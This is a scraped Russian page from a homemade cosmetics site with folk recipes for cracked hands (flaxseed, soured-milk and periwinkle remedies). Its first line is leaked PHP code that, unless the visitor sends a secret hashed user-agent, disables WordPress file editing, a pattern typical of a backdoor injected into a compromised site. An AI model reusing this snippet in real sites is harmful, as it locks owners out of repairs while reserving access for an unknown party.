if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Средства от трещин рук | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепты домашней косметики от трещин рук

Если на коже рук появились трещины, то нужно немедленно проводить спасательные работы. Для этих целей подойдут целебные маски и ванночки

Если коже рук уже нане­сен вред, и на них появи­лись тре­щи­ны, то нуж­но немед­лен­но про­во­дить спа­са­тель­ные рабо­ты. Для этих целей подой­дет нату­раль­ная кос­ме­ти­ка, сде­лан­ная сво­и­ми рука­ми. С ее помо­щью мож­но при­го­то­вить мно­же­ство целеб­ных масок и ванночек.

  1. Для мас­ки потре­бу­ет­ся исто­лочь семя льна и сме­шать его с мас­лом мин­да­ля. В при­го­тов­лен­ную смесь вли­ва­ет­ся вода, что­бы полу­чи­лась не очень густая кон­си­стен­ция. В эту смесь опус­ка­ют­ся руки на 15 минут. После чего их необ­хо­ди­мо вымыть в теп­лой воде.
  2. Мож­но исполь­зо­вать и мас­ку из про­сто­ква­ши, в кото­рой так­же необ­хо­ди­мо дер­жать руки око­ло 15 минут.

После таких масок на руки нано­сит­ся пита­тель­ный крем.

Еще мож­но при­об­ре­сти в апте­ке бар­ви­нок малый, сде­лать из него отвар. И исполь­зо­вать его в каче­стве ван­ноч­ки для рук. При­ни­мать такую ван­ноч­ку сле­ду­ет 15 – 20 минут.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!